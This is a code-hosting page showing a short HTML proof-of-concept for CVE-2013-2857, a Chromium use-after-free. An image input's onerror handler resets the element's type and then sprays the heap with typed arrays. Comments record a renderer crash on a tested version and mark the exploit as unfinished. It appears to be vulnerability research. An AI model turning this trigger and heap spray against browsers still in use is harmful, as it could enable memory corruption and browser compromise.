-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2013-2857.html
33 lines (32 loc) · 920 Bytes
/
CVE-2013-2857.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<!--
Tested on 5.5.1
CVE-2013-2857
Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
Result: Bug is present, crash on what is presumably render
-->
<html>
<body>
<script>
/*
fast/forms/image/image-error-event-crash.html
https://bugs.chromium.org/p/chromium/issues/detail?id=240124
*/
function UaF(){
x = document.getElementById("x");
console.log("test1");//prints "test1"
//TODO !
//Trig the use after free !
x.type="";
var arr = new Array(0x100);
for(var i = 0; i < 0x10; i++){
arr[i] = new Uint32Array(0x1000);
for(var j = 0; j < 0x1000; j++)
arr[i][j] = 0xFFFF0000;
}
console.log("test");//prints "test"
console.log(x);//prints a blank line (If I remove the line `x.type="";` then it prints "<input id="x" type="image" onerror="UaF()" src>)
}
</script>
<input id="x" type="image" onerror="UaF()" src="" />
</body>
</html>